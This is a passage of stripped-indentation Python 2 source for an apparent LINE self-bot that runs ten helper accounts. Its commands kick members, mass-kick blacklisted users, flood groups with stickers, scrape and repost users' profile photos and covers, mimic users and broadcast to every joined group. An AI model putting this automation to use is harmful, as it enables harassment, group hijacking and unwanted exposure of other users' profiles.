balas = ["Dont Tag Me!! Im Busy",cName + " Ngapain Ngetag?",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja","-_-","Alin lagi off", cName + " Kenapa Tag saya?","SPAM PC aja " + cName, "Jangan Suka Tag gua " + cName, "Kamu siapa " + cName + "?", "Ada Perlu apa " + cName + "?","Tenggelamkan tuh yang suka tag pake BOT","Tersummon -_-"]
ret_ = "[Auto Respond] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.kickoutFromGroup(msg.to,[msg.from_])
break
if msg.contentType == 13:
if wait["steal"] == True:
_name = msg.contentMetadata["displayName"]
copy = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
print "[Target] Stealed"
break
else:
targets.append(copy)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
wait["steal"] = False
break
except:
pass
if wait["alwayRead"] == True:
if msg.toType == 0:
cl.sendChatChecked(msg.from_,msg.id)
else:
cl.sendChatChecked(msg.to,msg.id)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"Done already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"Done done aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Done deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + "")
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Help2"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage2 + "")
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Help3"]:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage3 + "")
else:
cl.sendText(msg.to,helpt)
cl.sendText(msg.to,helpt)
elif ("Gn:" in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick:" in msg.text:
midd = msg.text.replace("Kick:"," ")
klist=[ki3,ki2,ki1,ki,cl]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[midd])
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ == admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki1.findAndAddContactsByMid(invite)
ki1.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
if msg.contentType == 13:
if wait['ainvite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki1.sendText(msg.to, _name + " สมาชิกอยู่ในกลุ่มเเล้ว")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki1.findAndAddContactsByMid(target)
ki1.inviteIntoGroup(msg.to,[target])
ki1.sendText(msg.to,"Invite " + _name)
wait['ainvite'] = False
break
except:
ki1.sendText(msg.to,"Error")
wait['ainvite'] = False
break
if msg.contentType == 13:
if wait['binvite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki2.sendText(msg.to, _name + " สมาชิกอยู่ในกลุ่มเเล้ว")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki2.findAndAddContactsByMid(target)
ki2.inviteIntoGroup(msg.to,[target])
ki2.sendText(msg.to,"Invite " + _name)
wait['binvite'] = False
break
except:
ki2.sendText(msg.to,"Error")
wait['binvite'] = False
break
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif msg.text.lower() == 'mybot':
msg.contentType = 13
msg.contentMetadata = {'mid': Amid1}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid2}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid3}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid4}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid5}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid6}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid7}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid8}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid9}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid10}
cl.sendMessage(msg)
elif msg.text.lower() == '#mybot':
msg.contentType = 13
msg.contentMetadata = {'mid': Amid1}
ki1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid2}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid3}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid4}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid5}
ki5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid6}
ki6.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid7}
ki7.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid8}
ki8.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid9}
ki9.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid10}
ki10.sendMessage(msg)
elif "me" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'yt ' in msg.text:
try:
textToSearch = (msg.text).replace('yt ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
elif msg.text in ["55","555"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
ki2.sendMessage(msg)
elif "youname " in msg.text.lower():
txt = msg.text.replace("youname ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Bl " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Done Banned")
print "[Command] Bannad"
except:
pass
#===========================================
#----------------------------------------------------------------------------
#------------------------------- UNBAN BY TAG -------------------------------
elif "Wl " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Done Unbanned")
print "[Command] Unbannad"
except:
pass
# elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
# text = msg.text
# if text is not None:
# cl.sendText(msg.to,text)
# else:
# if msg.contentType == 7:
# msg.contentType = 7
# msg.text = None
# msg.contentMetadata = {
# "STKID": "6",
# "STKPKGID": "1",
# "STKVER": "100" }
# cl.sendMessage(msg)
# elif msg.contentType == 13:
# msg.contentType = 13
# msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
# cl.sendMessage(msg)
elif "Mimic:" in msg.text:
if msg.from_ in admin:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on\n\nเปิดการเลียนเเบบ")
else:
cl.sendText(msg.to,"Mimic already on\n\nเปิดการเลียนเเบบ")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off\n\nปิดการเลียนเเบบ")
else:
cl.sendText(msg.to,"Mimic already off\n\nปิดการเลียนเเบบ")
elif "add:" in cmd:
target0 = msg.text.replace("Mimic:add:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets\n\nเกิดผิดพลาด")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"โปรเเกรมเลียนเเบบทำงาน")
break
elif "del:" in cmd:
target0 = msg.text.replace("Mimic:del:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets\n\nเกิดข้อผิดพลาด")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"คุณลบการเลียนเเบบผู้ใช้นี้")
break
elif cmd == "list":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<List Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n-> " + cl.getContact(a).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal: " + total)
#----------------------------------------------------------------------------
elif msg.text.lower() in ["botkill"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
ki1.kickoutFromGroup(msg.to,[jj])
pass
elif msg.text.lower() in ["admins","mee","creator"]:
msg.contentType = 13
adm = 'u65224f4e8812136f01b25275a54b5aef'
msg.contentMetadata = {'mid': adm}
cl.sendMessage(msg)
cl.sendText(msg.to,"Add Line http://line.me/ti/p/arif.mh")
cl.sendText(msg.to,"👆 สนใจ mybot ทักมาคุย กันได้นะครับ 👆")
#=========================================
elif msg.text in ["ของขวัญ","Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["kick1 gift","Gift 1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki1.sendMessage(msg)
elif msg.text in ["kick2 gift","Gift 2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["kick3 gift","Gift 3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot3 Gift","3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["kick4 gift","Gift 4"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["kick5 gift","Gift 5"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki5.sendMessage(msg)
elif msg.text in ["kick6 gift","Gift 6"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
ki6.sendMessage(msg)
elif msg.text in ["kick7 gift","Gift 7"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
ki7.sendMessage(msg)
elif msg.text in ["kick8 gift"," Gift 8"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '9'}
msg.text = None
ki8.sendMessage(msg)
elif msg.text in ["kick9 gift","Gift 9"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
ki9.sendMessage(msg)
elif msg.text in ["kick10 gift","Gift 10"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '11'}
msg.text = None
ki10.sendMessage(msg)
#====================================================
#VPS STUFF - VPS NEEDED TO RUN THIS COMMAND :)
elif msg.text in ["vps","kernel","Vps"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-svmo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel)
print "[Command]Kernel executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif "Group creator" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"old user")
elif 'ytmp3 ' in msg.text:
try:
textToSearch = (msg.text).replace('ytmp3 ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
elif "#set" in msg.text:
cl.sendText(msg.to, "Let's see who lazy to type")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif "#read" in msg.text:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "people who reading%s\n is this\n\n\nDate and time I started it:\n[%s]" % (wait2['readMember'][msg.to],setTime[msg.to]))
else:
cl.sendText(msg.to, "read point not set\nReading point setting you send it it will send an esxisting one")
elif msg.text in ["Myginfoid","Ginfo"]:
gid = cl.getGroupIdsJoined()
g = ""
for i in gid:
g += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,g)
elif msg.text in ["P1 invite","P1 Invite"]:
wait["ainvite"] = True
ki1.sendText(msg.to,"Send Contact")
elif msg.text in ["P2 invite","P2 Invite"]:
wait["binvite"] = True
ki2.sendText(msg.to,"Send Contact")
#==================================================
elif "notice:" in msg.text:
bctxt = msg.text.replace("notice:", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif msg.text.lower() == 'bann':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "#หำ1:" in msg.text:
string = msg.text.replace("#หำ1:","")
if len(string.decode('utf-8')) <= 20:
profile = ki1.getProfile()
profile.displayName = string
ki1.updateProfile(profile)
elif msg.text in ["join","มาหำ","#Kicker","#kicker","Kicker","kicker","•••"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.sendText(msg.to,"[SELF BOT\ทBy:☬ARIFISTIFIK☬ ]")
ki2.sendText(msg.to,"[Do not think will try.]")
ki3.sendText(msg.to,"[ By: ☬ARIFISTIFIK☬ ]")
ki1.sendText(msg.to,"Hello " + str(ginfo.name) + "\n[By:☬ARIFISTIFIK☬ ]")
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["kick"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["out","mybotออก","Bye","#bye"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki1.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki1.leaveGroup(msg.to)
ki2.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki2.leaveGroup(msg.to)
ki3.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki3.leaveGroup(msg.to)
ki4.sendText(msg.to,"Bye~Bye\nลาก่อย" + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki4.leaveGroup(msg.to)
ki5.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki5.leaveGroup(msg.to)
ki6.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]]")
ki6.leaveGroup(msg.to)
ki7.sendText(msg.to,"Bye~Bye\nลาก่อย ??" + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki7.leaveGroup(msg.to)
ki8.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki8.leaveGroup(msg.to)
ki9.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki9.leaveGroup(msg.to)
ki10.sendText(msg.to,"Bye~Bye\ลาก่อย " + str(ginfo.name) + "\n[By ☬ARIFISTIFIK☬]")
ki10.leaveGroup(msg.to)
except:
pass
elif msg.text.lower() == '#byeall':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
ki3.leaveGroup(msg.to)
ki4.leaveGroup(msg.to)
ki5.leaveGroup(msg.to)
ki6.leaveGroup(msg.to)
ki7.leaveGroup(msg.to)
ki8.leaveGroup(msg.to)
ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
except:
pass
elif "#v10" in msg.text:
cl.sendText(msg.to,"""[SELF BOT]\n[By:☬ARIFISTIFIK☬]")
คำสั่งmybot siri
คำนี้เป็นการล็อกห้องสั่งแล้วทุกคนจะทำอะไรไม่ได้นอกจากเจ้าของห้องทำได้คนเดียวเช่น•เปิดลิงค์•เชิญเพื่อน•เปลี่ยนรูปกลุ่ม•เปลี่ยนชื่อกลุ่มไรแบบนี้• mybotจะไม่เตะเเอทมินทุกกรณี
มีตั้งเเต่ชุดmybot 12-37 mybot
ชุดล๊อกห้อง
ล๊อกกันรันสติ๊กเกอร์
Set:StampLimitation:on
ล๊อกชื่อกลุ่ม
Set:changenamelock:on
ล๊อกการเชิญของสมาชิก
Set:blockinvite:on
ล๊อกแอทมินกลุ่ม
Set:ownerlock:on
ล๊อกรูปกลุ่ม
Set:iconlock:on
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:changeowner
เปลี่ยนเจ้าของห้องสั่งแล้วส่งคอลแทคคนที่จะเป็นเจ้าของห้องคนต่อไปลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:addblacklist
บัญชีดำแบ็คลิสคนไม่ให้เข้ากลุ่มสั่งแล้วส่งคอลแทคคนที่เราจะแบ็คลิสลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:addwhitelist
บัญชีขาวแก้ดำสั่งแล้วส่งคอลแทคคนที่เราจะแก้แบ๊คลิสลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:blockinvite:off ปลดล็อกการเชิญ
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:blockinvite:on ล็อกการเชิญ
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:inviteurl เปิดลิงค์
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:DenyURLInvite ปิดลิงค์
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:cancelinvite ยกเลิกค้างเชิญสั่ง2ครั้ง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:groupcreator เช็คเจ้าของบ้านตัวจริง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:extracreator เช็คเจ้าของบ้านคนสำรอง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:changeextraowner
เพิ่มเจ้าของบ้านคนที2หรือเรียกคนสำรองสั่งแล้วส่งคอลแทคคนที่จะเป็นคนสำรองลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:turncreator
สลับให้เจ้าของบ้านคนที่2เป็นตัวจริง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
ดูคนอ่าน
สั่งตั้งค่าก่อนแล้วค่อยสั่งอ่านคน
Setlastpoint ตั้งค่า
Viewlastseen สั่งอ่าน
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
สนใจติดต่อที่
By: ☬ARIFISTIFIK☬
LINE ID 4545272
http://line.me/ti/p/arif.mh
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
""")
#==================================================
elif msg.text in ["Invite"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"โปรดส่ง คท ด้วย")
elif msg.text in ["เชิญ"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"โปรดส่ง คท ด้วย")
elif msg.text in ["invite on"]:
if msg.from_ in admin:
wait["winvite"] = False
cl.sendText(msg.to,"ปิดการเชิญ แล้ว.")
elif msg.text in ["Bot1 invite contact","1เชิญ"]:
if msg.from_ in admin:
wait["ainvite"] = True
ki1.sendText(msg.to,"send contact")
